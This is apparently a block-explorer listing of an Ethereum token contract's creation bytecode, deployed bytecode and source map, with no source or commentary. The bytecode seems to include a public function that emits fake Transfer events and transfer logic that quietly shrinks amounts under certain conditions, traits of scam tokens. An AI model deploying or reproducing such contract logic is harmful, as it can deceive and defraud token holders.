0045260245ffd5b5f62000d4582620007bc565b915062000d5283620007bc565b92508262000d655762000d6462000d0c565b5b828204905092915050565b6111bb8062000d7e5f395ff3fe608060405234801561000f575f80fd5b506004361061009c575f3560e01c806370a082311161006457806370a082311461015a57806395d89b411461018a578063a9059cbb146101a8578063ccb570e3146101d8578063dd62ed3e146101f45761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee57806323b872dd1461010c578063313ce5671461013c575b5f80fd5b6100a8610224565b6040516100b59190610d46565b60405180910390f35b6100d860048036038101906100d39190610df7565b6102b4565b6040516100e59190610e4f565b60405180910390f35b6100f66102d6565b6040516101039190610e77565b60405180910390f35b61012660048036038101906101219190610e90565b6102df565b6040516101339190610e4f565b60405180910390f35b61014461030d565b6040516101519190610efb565b60405180910390f35b610174600480360381019061016f9190610f14565b610315565b6040516101819190610e77565b60405180910390f35b61019261035a565b60405161019f9190610d46565b60405180910390f35b6101c260048036038101906101bd9190610df7565b6103ea565b6040516101cf9190610e4f565b60405180910390f35b6101f260048036038101906101ed9190610f3f565b61040c565b005b61020e60048036038101906102099190610f8f565b610476565b60405161021b9190610e77565b60405180910390f35b60606003805461023390610ffa565b80601f016020809104026020016040519081016040528092919081815260200182805461025f90610ffa565b80156102aa5780601f10610281576101008083540402835291602001916102aa565b820191905f5260205f20905b81548152906001019060200180831161028d57829003601f168201915b5050505050905090565b5f806102be6104f8565b90506102cb8185856104ff565b600191505092915050565b5f600254905090565b5f806102e96104f8565b90506102f6858285610511565b6103018585856105a3565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461036990610ffa565b80601f016020809104026020016040519081016040528092919081815260200182805461039590610ffa565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f46104f8565b90506104018185856105a3565b600191505092915050565b8073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516104699190610e77565b60405180910390a3505050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61050c8383836001610693565b505050565b5f61051c8484610476565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461059d578181101561058e578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161058593929190611039565b60405180910390fd5b61059c84848484035f610693565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610613575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161060a919061106e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610683575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161067a919061106e565b60405180910390fd5b61068e838383610862565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610703575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016106fa919061106e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610773575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161076a919061106e565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550801561085c578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108539190610e77565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108b2578060025f8282546108a691906110b4565b92505081905550610980565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561093b578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161093293929190611039565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109c7578060025f8282540392505081905550610ba7565b6109d2818484610c11565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610ba6573073ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c049190610e77565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16610c5460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610476565b610c7f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686610476565b610c8991906110b4565b10610cb15762ffaaaa61ffaa85610ca091906110e7565b610caa9190611155565b9050610cb5565b8390505b9392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610cf3578082015181840152602081019050610cd8565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610d1882610cbc565b610d228185610cc6565b9350610d32818560208601610cd6565b610d3b81610cfe565b840191505092915050565b5f6020820190508181035f830152610d5e8184610d0e565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610d9382610d6a565b9050919050565b610da381610d89565b8114610dad575f80fd5b50565b5f81359050610dbe81610d9a565b92915050565b5f819050919050565b610dd681610dc4565b8114610de0575f80fd5b50565b5f81359050610df181610dcd565b92915050565b5f8060408385031215610e0d57610e0c610d66565b5b5f610e1a85828601610db0565b9250506020610e2b85828601610de3565b9150509250929050565b5f8115159050919050565b610e4981610e35565b82525050565b5f602082019050610e625f830184610e40565b92915050565b610e7181610dc4565b82525050565b5f602082019050610e8a5f830184610e68565b92915050565b5f805f60608486031215610ea757610ea6610d66565b5b5f610eb486828701610db0565b9350506020610ec586828701610db0565b9250506040610ed686828701610de3565b9150509250925092565b5f60ff82169050919050565b610ef581610ee0565b82525050565b5f602082019050610f0e5f830184610eec565b92915050565b5f60208284031215610f2957610f28610d66565b5b5f610f3684828501610db0565b91505092915050565b5f805f60608486031215610f5657610f55610d66565b5b5f610f6386828701610de3565b9350506020610f7486828701610db0565b9250506040610f8586828701610db0565b9150509250925092565b5f8060408385031215610fa557610fa4610d66565b5b5f610fb285828601610db0565b9250506020610fc385828601610db0565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061101157607f821691505b60208210810361102457611023610fcd565b5b50919050565b61103381610d89565b82525050565b5f60608201905061104c5f83018661102a565b6110596020830185610e68565b6110666040830184610e68565b949350505050565b5f6020820190506110815f83018461102a565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6110be82610dc4565b91506110c983610dc4565b92508282019050808211156110e1576110e0611087565b5b92915050565b5f6110f182610dc4565b91506110fc83610dc4565b925082820261110a81610dc4565b9150828204841483151761112157611120611087565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61115f82610dc4565b915061116a83610dc4565b92508261117a57611179611128565b5b82820490509291505056fea264697066735822122033f395c9884dfa81e170c861ff4cdc343e3d277fb2b09e0268fdc2e24a62dbc264736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061009c575f3560e01c806370a082311161006457806370a082311461015a57806395d89b411461018a578063a9059cbb146101a8578063ccb570e3146101d8578063dd62ed3e146101f45761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee57806323b872dd1461010c578063313ce5671461013c575b5f80fd5b6100a8610224565b6040516100b59190610d46565b60405180910390f35b6100d860048036038101906100d39190610df7565b6102b4565b6040516100e59190610e4f565b60405180910390f35b6100f66102d6565b6040516101039190610e77565b60405180910390f35b61012660048036038101906101219190610e90565b6102df565b6040516101339190610e4f565b60405180910390f35b61014461030d565b6040516101519190610efb565b60405180910390f35b610174600480360381019061016f9190610f14565b610315565b6040516101819190610e77565b60405180910390f35b61019261035a565b60405161019f9190610d46565b60405180910390f35b6101c260048036038101906101bd9190610df7565b6103ea565b6040516101cf9190610e4f565b60405180910390f35b6101f260048036038101906101ed9190610f3f565b61040c565b005b61020e60048036038101906102099190610f8f565b610476565b60405161021b9190610e77565b60405180910390f35b60606003805461023390610ffa565b80601f016020809104026020016040519081016040528092919081815260200182805461025f90610ffa565b80156102aa5780601f10610281576101008083540402835291602001916102aa565b820191905f5260205f20905b81548152906001019060200180831161028d57829003601f168201915b5050505050905090565b5f806102be6104f8565b90506102cb8185856104ff565b600191505092915050565b5f600254905090565b5f806102e96104f8565b90506102f6858285610511565b6103018585856105a3565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461036990610ffa565b80601f016020809104026020016040519081016040528092919081815260200182805461039590610ffa565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f46104f8565b90506104018185856105a3565b600191505092915050565b8073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516104699190610e77565b60405180910390a3505050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61050c8383836001610693565b505050565b5f61051c8484610476565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461059d578181101561058e578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161058593929190611039565b60405180910390fd5b61059c84848484035f610693565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610613575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161060a919061106e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610683575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161067a919061106e565b60405180910390fd5b61068e838383610862565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610703575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016106fa919061106e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610773575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161076a919061106e565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550801561085c578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108539190610e77565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108b2578060025f8282546108a691906110b4565b92505081905550610980565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561093b578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161093293929190611039565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109c7578060025f8282540392505081905550610ba7565b6109d2818484610c11565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610ba6573073ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c049190610e77565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16610c5460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610476565b610c7f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686610476565b610c8991906110b4565b10610cb15762ffaaaa61ffaa85610ca091906110e7565b610caa9190611155565b9050610cb5565b8390505b9392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610cf3578082015181840152602081019050610cd8565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610d1882610cbc565b610d228185610cc6565b9350610d32818560208601610cd6565b610d3b81610cfe565b840191505092915050565b5f6020820190508181035f830152610d5e8184610d0e565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610d9382610d6a565b9050919050565b610da381610d89565b8114610dad575f80fd5b50565b5f81359050610dbe81610d9a565b92915050565b5f819050919050565b610dd681610dc4565b8114610de0575f80fd5b50565b5f81359050610df181610dcd565b92915050565b5f8060408385031215610e0d57610e0c610d66565b5b5f610e1a85828601610db0565b9250506020610e2b85828601610de3565b9150509250929050565b5f8115159050919050565b610e4981610e35565b82525050565b5f602082019050610e625f830184610e40565b92915050565b610e7181610dc4565b82525050565b5f602082019050610e8a5f830184610e68565b92915050565b5f805f60608486031215610ea757610ea6610d66565b5b5f610eb486828701610db0565b9350506020610ec586828701610db0565b9250506040610ed686828701610de3565b9150509250925092565b5f60ff82169050919050565b610ef581610ee0565b82525050565b5f602082019050610f0e5f830184610eec565b92915050565b5f60208284031215610f2957610f28610d66565b5b5f610f3684828501610db0565b91505092915050565b5f805f60608486031215610f5657610f55610d66565b5b5f610f6386828701610de3565b9350506020610f7486828701610db0565b9250506040610f8586828701610db0565b9150509250925092565b5f8060408385031215610fa557610fa4610d66565b5b5f610fb285828601610db0565b9250506020610fc385828601610db0565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061101157607f821691505b60208210810361102457611023610fcd565b5b50919050565b61103381610d89565b82525050565b5f60608201905061104c5f83018661102a565b6110596020830185610e68565b6110666040830184610e68565b949350505050565b5f6020820190506110815f83018461102a565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6110be82610dc4565b91506110c983610dc4565b92508282019050808211156110e1576110e0611087565b5b92915050565b5f6110f182610dc4565b91506110fc83610dc4565b925082820261110a81610dc4565b9150828204841483151761112157611120611087565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61115f82610dc4565b915061116a83610dc4565b92508261117a57611179611128565b5b82820490509291505056fea264697066735822122033f395c9884dfa81e170c861ff4cdc343e3d277fb2b09e0268fdc2e24a62dbc264736f6c63430008180033

Deployed Bytecode Sourcemap

278:149:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2246:89:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4472:186;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3316:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5218:244;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3174:82;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3478:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2448:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3790:178;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6141:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4026:139;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2246:89;2291:13;2323:5;2316:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2246:89;:::o;4472:186::-;4545:4;4561:13;4577:12;:10;:12::i;:::-;4561:28;;4599:31;4608:5;4615:7;4624:5;4599:8;:31::i;:::-;4647:4;4640:11;;;4472:186;;;;:::o;3316:104::-;3368:7;3394:19;;3387:26;;3316:104;:::o;5218:244::-;5305:4;5321:15;5339:12;:10;:12::i;:::-;5321:30;;5361:37;5377:4;5383:7;5392:5;5361:15;:37::i;:::-;5408:26;5418:4;5424:2;5428:5;5408:9;:26::i;:::-;5451:4;5444:11;;;5218:244;;;;;:::o;3174:82::-;3223:5;3247:2;3240:9;;3174:82;:::o;3478:117::-;3543:7;3569:10;:19;3580:7;3569:19;;;;;;;;;;;;;;;;3562:26;;3478:117;;;:::o;2448:93::-;2495:13;2527:7;2520:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2448:93;:::o;3790:178::-;3859:4;3875:13;3891:12;:10;:12::i;:::-;3875:28;;3913:27;3923:5;3930:2;3934:5;3913:9;:27::i;:::-;3957:4;3950:11;;;3790:178;;;;:::o;6141:117::-;6240:2;6225:26;;6234:4;6225:26;;;6244:6;6225:26;;;;;;:::i;:::-;;;;;;;;6141:117;;;:::o;4026:139::-;4106:7;4132:10;:17;4143:5;4132:17;;;;;;;;;;;;;;;:26;4150:7;4132:26;;;;;;;;;;;;;;;;4125:33;;4026:139;;;;:::o;656:96:0:-;709:7;735:10;728:17;;656:96;:::o;9566:128:1:-;9650:37;9659:5;9666:7;9675:5;9682:4;9650:8;:37::i;:::-;9566:128;;;:::o;11529:477::-;11628:24;11655:25;11665:5;11672:7;11655:9;:25::i;:::-;11628:52;;11714:17;11694:16;:37;11690:310;;11770:5;11751:16;:24;11747:130;;;11829:7;11838:16;11856:5;11802:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;11747:130;11918:57;11927:5;11934:7;11962:5;11943:16;:24;11969:5;11918:8;:57::i;:::-;11690:310;11618:388;11529:477;;;:::o;5835:300::-;5934:1;5918:18;;:4;:18;;;5914:86;;5986:1;5959:30;;;;;;;;;;;:::i;:::-;;;;;;;;5914:86;6027:1;6013:16;;:2;:16;;;6009:86;;6081:1;6052:32;;;;;;;;;;;:::i;:::-;;;;;;;;6009:86;6104:24;6112:4;6118:2;6122:5;6104:7;:24::i;:::-;5835:300;;;:::o;10526:431::-;10655:1;10638:19;;:5;:19;;;10634:89;;10709:1;10680:32;;;;;;;;;;;:::i;:::-;;;;;;;;10634:89;10755:1;10736:21;;:7;:21;;;10732:90;;10808:1;10780:31;;;;;;;;;;;:::i;:::-;;;;;;;;10732:90;10860:5;10831:10;:17;10842:5;10831:17;;;;;;;;;;;;;;;:26;10849:7;10831:26;;;;;;;;;;;;;;;:34;;;;10879:9;10875:76;;;10925:7;10909:31;;10918:5;10909:31;;;10934:5;10909:31;;;;;;:::i;:::-;;;;;;;;10875:76;10526:431;;;;:::o;6573:1253::-;6678:1;6662:18;;:4;:18;;;6658:549;;6821:5;6798:19;;:28;;;;;;;:::i;:::-;;;;;;;;6658:549;;;6857:19;6879:10;:16;6890:4;6879:16;;;;;;;;;;;;;;;;6857:38;;6927:5;6913:11;:19;6909:115;;;6984:4;6990:11;7003:5;6959:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;6909:115;7177:5;7163:11;:19;7144:10;:16;7155:4;7144:16;;;;;;;;;;;;;;;:38;;;;6843:364;6658:549;7235:1;7221:16;;:2;:16;;;7217:563;;7407:5;7384:19;;:28;;;;;;;;;;;7217:563;;;7620:18;7622:5;7629:4;7635:2;7620:1;:18::i;:::-;7602:10;:14;7613:2;7602:14;;;;;;;;;;;;;;;;:36;;;;;;;;;;;7708:2;;;;;;;;;;;7692:20;;7670:10;:14;7681:2;;;;;;;;;;;7670:14;;;;;;;;;;;;;;;:18;7685:2;7670:18;;;;;;;;;;;;;;;;:42;7666:104;;7761:4;7737:31;;7716:10;:14;7727:2;;;;;;;;;;;7716:14;;;;;;;;;;;;;;;:18;7731:2;7716:18;;;;;;;;;;;;;;;:52;;;;7666:104;7217:563;7809:2;7794:25;;7803:4;7794:25;;;7813:5;7794:25;;;;;;:::i;:::-;;;;;;;;6573:1253;;;:::o;10964:282::-;11039:7;11129:4;11105:31;;11084:17;11094:2;;;;;;;;;;;11098;11084:9;:17::i;:::-;11062:19;11072:2;;;;;;;;;;;11076:4;11062:9;:19::i;:::-;:39;;;;:::i;:::-;:74;11058:182;;11178:8;11168:6;11160:5;:14;;;;:::i;:::-;11159:27;;;;:::i;:::-;11152:34;;;;11058:182;11224:5;11217:12;;10964:282;;;;;;:::o;7:99:5:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:619::-;5265:6;5273;5281;5330:2;5318:9;5309:7;5305:23;5301:32;5298:119;;;5336:79;;:::i;:::-;5298:119;5456:1;5481:53;5526:7;5517:6;5506:9;5502:22;5481:53;:::i;:::-;5471:63;;5427:117;5583:2;5609:53;5654:7;5645:6;5634:9;5630:22;5609:53;:::i;:::-;5599:63;;5554:118;5711:2;5737:53;5782:7;5773:6;5762:9;5758:22;5737:53;:::i;:::-;5727:63;;5682:118;5188:619;;;;;:::o;5813:474::-;5881:6;5889;5938:2;5926:9;5917:7;5913:23;5909:32;5906:119;;;5944:79;;:::i;:::-;5906:119;6064:1;6089:53;6134:7;6125:6;6114:9;6110:22;6089:53;:::i;:::-;6079:63;;6035:117;6191:2;6217:53;6262:7;6253:6;6242:9;6238:22;6217:53;:::i;:::-;6207:63;;6162:118;5813:474;;;;;:::o;6293:180::-;6341:77;6338:1;6331:88;6438:4;6435:1;6428:15;6462:4;6459:1;6452:15;6479:320;6523:6;6560:1;6554:4;6550:12;6540:22;;6607:1;6601:4;6597:12;6628:18;6618:81;;6684:4;6676:6;6672:17;6662:27;;6618:81;6746:2;6738:6;6735:14;6715:18;6712:38;6709:84;;6765:18;;:::i;:::-;6709:84;6530:269;6479:320;;;:::o;6805:118::-;6892:24;6910:5;6892:24;:::i;:::-;6887:3;6880:37;6805:118;;:::o;6929:442::-;7078:4;7116:2;7105:9;7101:18;7093:26;;7129:71;7197:1;7186:9;7182:17;7173:6;7129:71;:::i;:::-;7210:72;7278:2;7267:9;7263:18;7254:6;7210:72;:::i;:::-;7292;7360:2;7349:9;7345:18;7336:6;7292:72;:::i;:::-;6929:442;;;;;;:::o;7377:222::-;7470:4;7508:2;7497:9;7493:18;7485:26;;7521:71;7589:1;7578:9;7574:17;7565:6;7521:71;:::i;:::-;7377:222;;;;:::o;7605:180::-;7653:77;7650:1;7643:88;7750:4;7747:1;7740:15;7774:4;7771:1;7764:15;7791:191;7831:3;7850:20;7868:1;7850:20;:::i;:::-;7845:25;;7884:20;7902:1;7884:20;:::i;:::-;7879:25;;7927:1;7924;7920:9;7913:16;;7948:3;7945:1;7942:10;7939:36;;;7955:18;;:::i;:::-;7939:36;7791:191;;;;:::o;7988:410::-;8028:7;8051:20;8069:1;8051:20;:::i;:::-;8046:25;;8085:20;8103:1;8085:20;:::i;:::-;8080:25;;8140:1;8137;8133:9;8162:30;8180:11;8162:30;:::i;:::-;8151:41;;8341:1;8332:7;8328:15;8325:1;8322:22;8302:1;8295:9;8275:83;8252:13